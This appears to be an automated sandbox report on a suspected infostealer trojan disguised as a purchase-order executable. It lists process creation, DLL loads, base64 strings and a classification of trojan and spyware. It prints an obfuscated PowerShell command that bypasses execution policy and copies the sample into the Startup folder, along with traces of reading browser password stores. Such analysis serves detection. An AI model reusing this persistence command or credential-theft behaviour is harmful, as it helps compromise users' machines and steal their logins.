'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
                    Source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, Symbols.csBase64 encoded string: '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
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/11@2/3
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-095325.scr.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvbxtp5v.tvb.ps1Jump to behavior
                    Source: PO-095325.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: PO-095325.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegAsm.exe, 00000004.00000002.4466181997.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000033EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: PO-095325.scr.exeReversingLabs: Detection: 28%
                    Source: unknownProcess created: C:\Users\user\Desktop\PO-095325.scr.exe "C:\Users\user\Desktop\PO-095325.scr.exe"
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
